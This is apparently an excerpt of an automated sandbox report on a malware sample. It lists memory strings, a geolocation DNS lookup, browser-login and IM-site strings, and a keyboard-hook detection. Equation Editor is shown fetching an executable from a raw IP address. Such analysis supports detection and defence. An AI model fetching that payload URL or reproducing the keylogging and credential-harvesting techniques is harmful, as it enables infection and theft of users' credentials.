Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: bhv41C2.tmp.9.dr	String found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: geoplugin.net

Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.358867857.0000000000672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.25/350/taskhostw.exe
Source: EQNEDT32.EXE, 00000002.00000002.358867857.0000000000672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.25/350/taskhostw.exe&c
Source: EQNEDT32.EXE, 00000002.00000002.358867857.0000000000672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.25/350/taskhostw.exej
Source: EQNEDT32.EXE, 00000002.00000002.358867857.0000000000672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.25/350/taskhostw.exennC:
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://acdn.adnxs.com/ast/ast.js
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://b.scorecardresearch.com/beacon.js
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
Source: svchost.exe, svchost.exe, 00000007.00000003.370096771.0000000000264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.370058361.0000000000264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.382229901.0000000000264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.369772696.0000000000259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.382020274.0000000000262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.854796497.0000000000264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.370178549.0000000000264000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: name.exe, 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: svchost.exe, 0000000B.00000002.371347522.000000000019C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com/Y
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://www.msn.com/
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: bhv41C2.tmp.9.dr	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: svchost.exe, 00000009.00000002.378984808.0000000000124000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://contextual.media.net/
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: svchost.exe, 00000009.00000003.378925732.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com
Source: svchost.exe, 00000009.00000003.378615082.000000000055E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.378336517.0000000000560000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.379157015.00000000025A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.378511247.00000000026AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: bhv41C2.tmp.9.dr	String found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000

7_2_0040A2F3

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

